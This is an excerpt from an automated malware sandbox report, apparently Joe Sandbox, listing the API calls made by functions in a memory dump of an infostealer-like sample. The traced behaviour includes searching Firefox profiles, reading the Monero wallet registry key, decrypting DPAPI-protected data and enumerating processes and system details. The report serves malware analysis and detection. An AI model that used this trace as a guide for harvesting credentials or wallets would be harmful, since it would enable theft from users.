                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.2170451919.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000435000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000439000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.000000000043D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.000000000052D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000530000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000555000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000574000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.000000000060E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000640000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: FileH_prologlstrcpy$Find$lstrcat$CloseCopyDeleteFirstNextSystemTimelstrlen
                                                                                                                                                                                                                                                                  • String ID: prefs.js
                                                                                                                                                                                                                                                                  • API String ID: 2318033617-3783873740
                                                                                                                                                                                                                                                                  • Opcode ID: b767b6bbc18f6e640dd923ce44a78389a87468a3cd493a85dd72a84e1a454d7b
                                                                                                                                                                                                                                                                  • Instruction ID: ebdaa208b6f6b48960125bb055502522e666457ca282af0fd5dc55d4e58b1859
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: b767b6bbc18f6e640dd923ce44a78389a87468a3cd493a85dd72a84e1a454d7b
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 81D18471904248EADF14EBA5D945BDDBBB49F15308F1440BEE409B36C2DB781B4CCBA6
                                                                                                                                                                                                                                                                  Function 00409538 Relevance: 15.3, APIs: 10, Instructions: 301fileCOMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • _EH_prolog.MSVCRT ref: 0040953D
                                                                                                                                                                                                                                                                    • Part of subcall function 0040F96A: lstrcpy.KERNEL32(00000000,00000000), ref: 0040F994
                                                                                                                                                                                                                                                                    • Part of subcall function 0040FA6F: _EH_prolog.MSVCRT ref: 0040FA74
                                                                                                                                                                                                                                                                    • Part of subcall function 0040FA6F: lstrcpy.KERNEL32(00000000), ref: 0040FAC0
                                                                                                                                                                                                                                                                    • Part of subcall function 0040FA6F: lstrcat.KERNEL32(?,?), ref: 0040FACA
                                                                                                                                                                                                                                                                    • Part of subcall function 0040FAE3: _EH_prolog.MSVCRT ref: 0040FAE8
                                                                                                                                                                                                                                                                    • Part of subcall function 0040FAE3: lstrlenA.KERNEL32(?,?,?,?,?,0041738F,?,?,00426B18,?,00000000,004265B7), ref: 0040FB10
                                                                                                                                                                                                                                                                    • Part of subcall function 0040FAE3: lstrcpy.KERNEL32(00000000), ref: 0040FB37
                                                                                                                                                                                                                                                                    • Part of subcall function 0040FAE3: lstrcat.KERNEL32(?,?), ref: 0040FB42
                                                                                                                                                                                                                                                                    • Part of subcall function 0040FA28: lstrcpy.KERNEL32(00000000,?), ref: 0040FA61
                                                                                                                                                                                                                                                                  • FindFirstFileA.KERNEL32(00000000,?,00000000,?,00425E1C,?,?,00425BFA,?), ref: 004095BA
                                                                                                                                                                                                                                                                  • StrCmpCA.SHLWAPI(?,00425E20), ref: 004095D7
                                                                                                                                                                                                                                                                  • StrCmpCA.SHLWAPI(?,00425E24), ref: 004095F1
                                                                                                                                                                                                                                                                  • StrCmpCA.SHLWAPI(?,00000000,?,?,?,00425E28,?,?,00425BFB), ref: 00409688
                                                                                                                                                                                                                                                                  • StrCmpCA.SHLWAPI(?), ref: 00409709
                                                                                                                                                                                                                                                                    • Part of subcall function 004010B1: _EH_prolog.MSVCRT ref: 004010B6
                                                                                                                                                                                                                                                                    • Part of subcall function 0040F9A1: lstrcpy.KERNEL32(00000000,plA), ref: 0040F9C7
                                                                                                                                                                                                                                                                    • Part of subcall function 004087AC: _EH_prolog.MSVCRT ref: 004087B1
                                                                                                                                                                                                                                                                    • Part of subcall function 004087AC: CopyFileA.KERNEL32(00000000,00000000,00000001,00000000,00000000,00000000,?,00425DC8,?,?,?,00425BEA,00000000), ref: 00408894
                                                                                                                                                                                                                                                                  • FindNextFileA.KERNELBASE(00000000,?), ref: 004098F2
                                                                                                                                                                                                                                                                  • FindClose.KERNEL32(00000000), ref: 00409901
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.2170451919.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000435000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000439000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.000000000043D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.000000000052D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000530000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000555000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000574000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.000000000060E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000640000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: H_prologlstrcpy$FileFind$lstrcat$CloseCopyFirstNextlstrlen
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 322284088-0
                                                                                                                                                                                                                                                                  • Opcode ID: ecb9762d719c40b58762c32462bef66d88fcf200f6aedc947e701d74365d4b82
                                                                                                                                                                                                                                                                  • Instruction ID: efd84210ae520734bfd6f4ce5bb2e912d509620c07065cbfa290a73af79222eb
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: ecb9762d719c40b58762c32462bef66d88fcf200f6aedc947e701d74365d4b82
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 07C17170900248EACF14EBB5D946BDD7BB8AF16314F14407AE845B36C2DB785B4CCBA6
                                                                                                                                                                                                                                                                  Function 0040FD2C Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 96memoryCOMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • _EH_prolog.MSVCRT ref: 0040FD31
                                                                                                                                                                                                                                                                    • Part of subcall function 0040F96A: lstrcpy.KERNEL32(00000000,00000000), ref: 0040F994
                                                                                                                                                                                                                                                                  • GetKeyboardLayoutList.USER32(00000000,00000000,004262AF,00000001,?,00000000), ref: 0040FD63
                                                                                                                                                                                                                                                                  • LocalAlloc.KERNEL32(00000040,00000000,?,00000000), ref: 0040FD71
                                                                                                                                                                                                                                                                  • GetKeyboardLayoutList.USER32(00000000,00000000,?,00000000), ref: 0040FD7C
                                                                                                                                                                                                                                                                  • GetLocaleInfoA.KERNEL32(?,00000002,?,00000200,?,00000000), ref: 0040FDA6
                                                                                                                                                                                                                                                                    • Part of subcall function 0040FAE3: _EH_prolog.MSVCRT ref: 0040FAE8
                                                                                                                                                                                                                                                                    • Part of subcall function 0040FAE3: lstrlenA.KERNEL32(?,?,?,?,?,0041738F,?,?,00426B18,?,00000000,004265B7), ref: 0040FB10
                                                                                                                                                                                                                                                                    • Part of subcall function 0040FAE3: lstrcpy.KERNEL32(00000000), ref: 0040FB37
                                                                                                                                                                                                                                                                    • Part of subcall function 0040FAE3: lstrcat.KERNEL32(?,?), ref: 0040FB42
                                                                                                                                                                                                                                                                    • Part of subcall function 0040FA28: lstrcpy.KERNEL32(00000000,?), ref: 0040FA61
                                                                                                                                                                                                                                                                  • LocalFree.KERNEL32(?), ref: 0040FE4A
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.2170451919.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000435000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000439000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.000000000043D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.000000000052D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000530000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000555000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000574000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.000000000060E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000640000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: lstrcpy$H_prologKeyboardLayoutListLocal$AllocFreeInfoLocalelstrcatlstrlen
                                                                                                                                                                                                                                                                  • String ID: /
                                                                                                                                                                                                                                                                  • API String ID: 2868853201-4001269591
                                                                                                                                                                                                                                                                  • Opcode ID: 92e071ab801f0db61b14f0168bd1f81db25867dd4a50f7c59fa7fed81c36036c
                                                                                                                                                                                                                                                                  • Instruction ID: dcc11d28f45ebc8cfaab3832ba2d693f5241e9ce6e9ea0b2958ce293e91e36ff
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 92e071ab801f0db61b14f0168bd1f81db25867dd4a50f7c59fa7fed81c36036c
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 05311D75900219AADB10EFE5D885AEEBBB9FF05304F10407EF509B3681C7785A88CBA4
                                                                                                                                                                                                                                                                  Function 004111A4 Relevance: 9.0, APIs: 6, Instructions: 45processCOMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • _EH_prolog.MSVCRT ref: 004111A9
                                                                                                                                                                                                                                                                  • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 004111CF
                                                                                                                                                                                                                                                                  • Process32First.KERNEL32(00000000,00000128), ref: 004111DF
                                                                                                                                                                                                                                                                  • Process32Next.KERNEL32(00000000,00000128), ref: 004111F1
                                                                                                                                                                                                                                                                  • StrCmpCA.SHLWAPI(?,?,?,?,00000000), ref: 00411205
                                                                                                                                                                                                                                                                  • CloseHandle.KERNEL32(00000000,?,?,00000000), ref: 00411218
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.2170451919.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000435000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000439000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.000000000043D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.000000000052D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000530000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000555000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000574000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.000000000060E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000640000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: Process32$CloseCreateFirstH_prologHandleNextSnapshotToolhelp32
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 186290926-0
                                                                                                                                                                                                                                                                  • Opcode ID: 57e2ec9f76e60a98c97f91058bdc7df08fd1ea17670469dff29c1dfca660a2dc
                                                                                                                                                                                                                                                                  • Instruction ID: 98c4fa7d0167b96bf458f732a71a4dcae4464149a6157113ee50ffc1eebab319
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 57e2ec9f76e60a98c97f91058bdc7df08fd1ea17670469dff29c1dfca660a2dc
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: A0015A75901528EBDB219B95DC48AEEBBB9EF86340F104096F601E2220D7788F81CBA5
                                                                                                                                                                                                                                                                  Function 0041070C Relevance: 7.6, APIs: 5, Instructions: 62commemoryCOMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • CoCreateInstance.OLE32(004280A0,00000000,00000001,00426478,00000000,?), ref: 0041072C
                                                                                                                                                                                                                                                                  • SysAllocString.OLEAUT32(00000000), ref: 0041073A
                                                                                                                                                                                                                                                                  • _wtoi64.MSVCRT ref: 0041077C
                                                                                                                                                                                                                                                                  • SysFreeString.OLEAUT32(?), ref: 00410791
                                                                                                                                                                                                                                                                  • SysFreeString.OLEAUT32(00000000), ref: 00410794
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.2170451919.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000435000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000439000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.000000000043D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.000000000052D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000530000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000555000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000574000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.000000000060E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000640000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: String$Free$AllocCreateInstance_wtoi64
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 1817501562-0
                                                                                                                                                                                                                                                                  • Opcode ID: 0290d031e2a3dbc784d0dff4a7f08d204b59bf745b9abe95a94d8c41dc83014d
                                                                                                                                                                                                                                                                  • Instruction ID: 9bc869d4a87f0a99df79a9dd4561241c96e52cc0e637bffe87c645f5d44d53b9
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 0290d031e2a3dbc784d0dff4a7f08d204b59bf745b9abe95a94d8c41dc83014d
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: B3118E34A00208BFDB00DBA5DC48FDEBFB9EF89714F1480A9E5049B250DBB5A586CB64
                                                                                                                                                                                                                                                                  Function 00410D92 Relevance: 6.1, APIs: 4, Instructions: 53memoryencryptionCOMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • CryptBinaryToStringA.CRYPT32(?,?,40000001,00000000,?), ref: 00410DB6
                                                                                                                                                                                                                                                                  • GetProcessHeap.KERNEL32(00000000,?,?,0040443E,?,?,?,?,?,?), ref: 00410DC3
                                                                                                                                                                                                                                                                  • RtlAllocateHeap.NTDLL(00000000,?,0040443E,?,?,?,?,?,?), ref: 00410DCA
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.2170451919.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000435000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000439000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.000000000043D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.000000000052D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000530000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000555000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000574000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.000000000060E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000640000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: Heap$AllocateBinaryCryptProcessString
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 869800140-0
                                                                                                                                                                                                                                                                  • Opcode ID: fd999e819934099ffb11a9de783e20fe4796dd89c6bd1e87886222eae30587c2
                                                                                                                                                                                                                                                                  • Instruction ID: ec109ba8dd0b0e36f513698a7a9e762a41f090890661f4f8981a11abce3ef42c
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: fd999e819934099ffb11a9de783e20fe4796dd89c6bd1e87886222eae30587c2
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 1C016975200209FFDF118FA1DC448EBBBAEFF4A360B104425F90193210D775AC90EBA0
                                                                                                                                                                                                                                                                  Function 00401000 Relevance: 6.0, APIs: 4, Instructions: 35memoryregistryCOMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • GetProcessHeap.KERNEL32(00000000,00000104,00000000,?,?,?,00401CA7,80000001,SOFTWARE\monero-project\monero-core,wallet_path,?,00000000), ref: 00401014
                                                                                                                                                                                                                                                                  • HeapAlloc.KERNEL32(00000000,?,?,?,00401CA7,80000001,SOFTWARE\monero-project\monero-core,wallet_path,?,00000000), ref: 0040101B
                                                                                                                                                                                                                                                                  • RegOpenKeyExA.KERNEL32(000000FF,00000000,00000000,00020119,?,?,?,?,00401CA7,80000001,SOFTWARE\monero-project\monero-core,wallet_path,?,00000000), ref: 00401034
                                                                                                                                                                                                                                                                  • RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,00000000,000000FF,?,?,?,00401CA7,80000001,SOFTWARE\monero-project\monero-core,wallet_path,?,00000000), ref: 0040104D
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.2170451919.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000435000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000439000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.000000000043D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.000000000052D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000530000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000555000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000574000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.000000000060E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000640000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: Heap$AllocOpenProcessQueryValue
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 3676486918-0
                                                                                                                                                                                                                                                                  • Opcode ID: 0d05674718316e095d30fb5048cb9e0605715a5f03c012fc02b2c76bf856e2be
                                                                                                                                                                                                                                                                  • Instruction ID: a535ca16ea02c757ebdc93c68dc539e26f6d5eb16a56349bbf7fb8c321cb2dfc
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 0d05674718316e095d30fb5048cb9e0605715a5f03c012fc02b2c76bf856e2be
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 3BF03079240248FFDB115F91DD0AF9E7B7AEB46B40F104025FB01A91A0DBB19A909B20
                                                                                                                                                                                                                                                                  Function 0040FCD9 Relevance: 6.0, APIs: 4, Instructions: 29memorytimeCOMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • GetProcessHeap.KERNEL32(00000000,00000104,?,00000000,00000000,?,Computer Name: ,00000000,?,00426644,00000000,?,00000000,00000000,?,AV: ), ref: 0040FCEA
                                                                                                                                                                                                                                                                  • HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,Computer Name: ,00000000,?,00426644,00000000,?,00000000,00000000,?,AV: ,00000000), ref: 0040FCF1
                                                                                                                                                                                                                                                                  • GetTimeZoneInformation.KERNEL32(00000000,?,00000000,00000000,?,Computer Name: ,00000000,?,00426644,00000000,?,00000000,00000000,?,AV: ,00000000), ref: 0040FD00
                                                                                                                                                                                                                                                                  • wsprintfA.USER32 ref: 0040FD1E
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.2170451919.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000435000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000439000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.000000000043D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.000000000052D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000530000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000555000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000574000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.000000000060E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000640000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: Heap$AllocInformationProcessTimeZonewsprintf
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 362916592-0
                                                                                                                                                                                                                                                                  • Opcode ID: 446455e5df110580dbde9c98f5101df497741838af6a82f60c9ac386fe9bd983
                                                                                                                                                                                                                                                                  • Instruction ID: 429dfdafe37f2ee45bf2bd2832675558048c125e369346c3a49fa21dab44cbe0
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 446455e5df110580dbde9c98f5101df497741838af6a82f60c9ac386fe9bd983
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: A8E09B75700224BBE72067A4AC0EF96365D9B03725F111261F615D61D0E674994886A5
                                                                                                                                                                                                                                                                  Function 004062F8 Relevance: 4.5, APIs: 3, Instructions: 46memoryencryptionCOMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 0040631B
                                                                                                                                                                                                                                                                  • LocalAlloc.KERNEL32(00000040,?,?), ref: 00406333
                                                                                                                                                                                                                                                                  • LocalFree.KERNEL32(?), ref: 00406351
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.2170451919.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000435000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000439000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.000000000043D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.000000000052D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000530000.00000040.00000400.00020000.00000000.sdmpDownload File
